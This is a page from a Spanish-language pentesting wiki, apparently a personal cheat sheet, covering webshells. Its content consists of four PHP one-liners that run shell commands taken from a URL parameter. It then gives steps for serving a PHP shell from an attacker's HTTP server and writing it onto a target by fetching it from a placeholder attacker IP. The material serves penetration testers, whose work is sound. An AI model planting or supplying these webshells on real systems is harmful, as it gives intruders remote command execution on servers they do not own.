Grimorio de XTORMIN
Xtormin GithubLinkedIn
  • Home
  • 🧠IA / AI
    • Investigación y automatización
    • IA en local
    • Plantillas de prompts
      • Informes de pentesting
  • 🏢Pentesting en Infraestructuras
    • Intrusión física
    • Redes Wi-Fi
      • Herramientas
      • Metodología de Pentest Wifi
      • WEP
      • WPA2-PSK / Red personal
      • WPA2-MGT / Red corporativa
    • Cloud
      • 🔷Azure
        • Herramientas
        • Metodología de Azure Pentest
        • AzureAD
        • Az Powershell
        • Az Cli
        • Portal de Azure
    • Perímetro
      • Acceso remoto
    • Red interna
      • Windows
      • Active directory
        • Enumeración manual
    • Servicios
      • FTP - 21/tcp
      • SSH - 22/tcp
      • DNS - 53/UDP
      • SMB - 135, 445 /tcp
      • SNMP - 161, 162, 10161, 10162/udp
      • IPMI - 623/udp/tcp
      • RDP - 3389/TCP
      • Redis - 6379/tcp
    • Misc
      • Transferencia de ficheros
  • 🌐Pentesting en aplicaciones web
    • General
      • Ataques y vulnerabilidades
        • Autenticación
          • Vulnerabilidades JWT
        • Javascript
          • XSS
          • Contaminación de prototipos - Prototype pollution
        • GraphQL
      • Explotación
        • Webshell
    • Tecnología
      • Jenkins
      • Salesforce
  • ⚒️Herramientas comunes
    • Recursos generales
    • Nmap
    • Nuclei
    • BloodHound
  • 👾MISC
    • [ Kali ] Setup
      • VPN
Con tecnología de GitBook
En esta página
  • Webshell
  • PHP

¿Te fue útil?

  1. Pentesting en aplicaciones web
  2. General
  3. Explotación

Webshell

Webshell

PHP

<?php echo system($_GET['cmd']); ?>
<?php echo exec($_GET['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php echo shell_exec($_GET['cmd']); ?>

Si todas las funciones anteriores están bloqueadas, se puede crear un fichero PHP desde un servidor remoto, y en este incluir nuestro código malicioso:

  1. Crear un fichero "s.php" con alguno de los valores anteriores, por ejemplo:

<?php echo system($_GET['cmd']); ?>
  1. Poner el puerto 80 a la escucha:

python3 -m http.server 80
  1. Modificar el siguiente comando con los valores de la IP del servidor donde se aloja el fichero PHP y el nombre con el que queremos almacenar el fichero en el servidor:

<?php file_put_contents('s.php',file_get_contents('http://<IP atacante>:80/s.php')) ?>
AnteriorExplotaciónSiguienteTecnología

Última actualización hace 2 meses

¿Te fue útil?

🌐